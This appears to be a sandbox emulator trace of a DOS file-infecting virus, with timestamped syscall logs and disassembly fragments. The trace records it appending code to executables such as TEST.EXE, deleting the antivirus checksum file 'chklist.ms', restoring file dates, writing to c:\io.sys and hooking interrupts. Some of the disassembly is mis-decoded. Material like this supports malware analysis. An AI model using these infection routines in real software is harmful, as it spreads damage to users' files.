0x15581: xor cx, dx
0x15583: xor dx, cx
0x15585: iret
0x15586: cmp word ptr [bp + si - 0x57], dx
0x15589: or cx, bx
0x1558b: ljmp 0x11e1:0xc8cb
0x15590: enter -0x67a6, -0x1a
0x15594: sbb word ptr [si], di
0x15596: xchg ax, cx
0x15597: xchg ax, sp
0x15598: retf
0x15599: push es
0x1559a: mov bx, word ptr es:[bp + 0x1cd3]
2018-12-25T12:23:35.602019576Z 64 PC: 1557b | Write file or device (Write 24 bytes on handle 5)
2018-12-25T12:23:35.605229415Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:35.607017935Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:35.62278315Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:35.625852851Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:35.632282262Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:35.639168992Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:35.640902422Z 62 PC: 155d0 | Close file
2018-12-25T12:23:35.650610657Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:35.661056169Z 79 PC: 1541f | Find next file
2018-12-25T12:23:35.66711929Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:35.671178145Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:35.67301218Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:35.674365032Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:35.680579525Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:35.690499012Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:35.696638235Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:35.698065046Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:35.707239108Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:35.712972517Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.052916174Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.062708093Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.06407036Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.069726637Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.072235817Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.075423479Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.078516319Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.082647808Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.088986912Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.091654035Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.103199464Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.106090185Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.109019261Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.11144248Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.119499936Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.122416345Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.132010031Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.138194763Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.139757109Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.146994385Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.156572477Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.159501933Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.165422472Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.183051174Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.189803404Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.192427168Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.199132918Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.201326601Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.203467423Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.206421949Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.208807697Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.214858781Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.218385345Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.226065432Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.228510431Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.232135073Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.233483792Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.234920809Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.238884626Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.24474044Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.250641741Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.253246822Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.261639529Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.270760821Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.274545327Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.280767402Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.290007439Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.297078436Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.298477562Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.30399448Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.306137451Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.308245802Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.310345775Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.313012362Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.318992455Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.321251955Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.33078632Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.33292609Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.336604852Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.338963108Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.340248101Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.343180377Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.349502945Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.355973935Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.35739746Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.66715544Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.676792244Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.679794909Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.685639913Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.695917413Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.702428837Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.703887946Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.709700883Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.711107059Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.713101961Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.715255608Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.717225403Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.723391584Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.72626845Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.733742229Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.736060585Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.742870695Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.744225313Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.745468295Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.748900865Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.754571331Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.761807618Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.764679231Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.773229436Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.782487519Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.786582554Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.792518469Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.801867288Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.808816002Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.810103816Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.815429038Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.817276512Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.819577335Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.821993745Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.82532655Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.83244378Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.834738954Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.842339802Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.844555253Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.847758481Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.850502394Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.852145343Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.855194794Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.86197226Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.868362673Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.870117319Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.877444243Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.886878281Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:36.888357722Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.893413119Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.897934585Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:36.899276542Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.904265054Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:36.905637129Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:36.909644576Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:36.913048942Z 67 PC: 15362 | Get or set file attributes
2018-12-25T12:23:36.918362553Z 67 PC: 1536a | Get or set file attributes
2018-12-25T12:23:36.927410192Z 61 PC: 1536f | Open file (Filename = 'c:\io.sys')
2018-12-25T12:23:36.934419956Z 66 PC: 15379 | Move file pointer
2018-12-25T12:23:36.935797672Z 64 PC: 15384 | Write file or device (Write 15 bytes on handle 5)
2018-12-25T12:23:36.939576645Z 62 PC: 15388 | Close file
2018-12-25T12:23:36.944489026Z 67 PC: 15392 | Get or set file attributes
2018-12-25T12:23:36.96400023Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.965150483Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.966367519Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.968029279Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.969335633Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.970382644Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.971950441Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.972923342Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.973978081Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.976418783Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.977398464Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.978544521Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.979937627Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.981083506Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.982597723Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.983583412Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.98452686Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.986094915Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.987263301Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.988210808Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.989676013Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:36.990642119Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:36.991597456Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:36.993319535Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:37.145053242Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:37.146548408Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:37.148296399Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.149339841Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.150402416Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.152720177Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.15460995Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.156059375Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.158341324Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.160130069Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.161570615Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.163795213Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.165543524Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.166979969Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.169142792Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.17086856Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.172274111Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.17453661Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.175638457Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.176774818Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.178969433Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.180992663Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.183109803Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.18558538Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.187704675Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.189740672Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.192437036Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.194477932Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.196354607Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.198808758Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.200799784Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.202673263Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.205038711Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.206880992Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.208748221Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.211089719Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.212984174Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.214831861Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.217090397Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.218983466Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.220837565Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.223159102Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.225333254Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.227335786Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.229709781Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.232590175Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.235715881Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.23795072Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.239937024Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.242336371Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.253129646Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.255013035Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.257311111Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.260648888Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":30,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:36.153650833Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:36.15611636Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:36.158948521Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:36.160663431Z 78 PC: 15408 | Find first file
2018-12-25T12:23:36.167437613Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:36.173679968Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:36.196200681Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:36.202896569Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:36.206513679Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:36.212756677Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:36.214323831Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:36.217464258Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:36.219764685Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:36.221898305Z 64 PC: 15550 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:23:36.225442141Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:36.227942297Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:36.237069654Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: lodsw ax, word ptr [si]
0x1557f: add byte ptr [bx + 0x31], dl
0x15582: fdiv qword ptr [bx + di]
2018-12-25T12:23:36.240568551Z 64 PC: 1557b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:23:36.244598806Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:36.246915078Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:36.249241425Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:36.252688431Z 67 PC: 15345 | Get or set file attributes
2018-12-25T12:23:36.259107297Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
2018-12-25T12:23:36.269271082Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:36.270753715Z 62 PC: 155d0 | Close file
2018-12-25T12:23:36.278539889Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:36.288978881Z 79 PC: 1541f | Find next file
2018-12-25T12:23:36.291565116Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:36.295640574Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:36.297775506Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:36.299341237Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:36.305314374Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.309924894Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:36.315975759Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:36.318087137Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:36.32781784Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.333653208Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.668401182Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.675979761Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.677611508Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.68314595Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.685488035Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.687744635Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.689940255Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.692300035Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.699807849Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.702310273Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.712510316Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.716092124Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.719078036Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.720617507Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.723451545Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.731002667Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.739488696Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.747097872Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.748843455Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.755807558Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.765934363Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.769213371Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.775108961Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.786185336Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.790471119Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.791553574Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.795851987Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.797002279Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.798532417Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.801138556Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.803362409Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.809549194Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.81626022Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.831504966Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.833653278Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.83721221Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.838534932Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.840221287Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.843704754Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.850813922Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.856573623Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.858960547Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.865916296Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.875881735Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.87976765Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.885624725Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.895004015Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.902657416Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.905353937Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.912882901Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.914966313Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.917862686Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.920119264Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.92651081Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.933813023Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.936887543Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.945619637Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.948841115Z 64 PC: 1557b | Write file or device (See above)
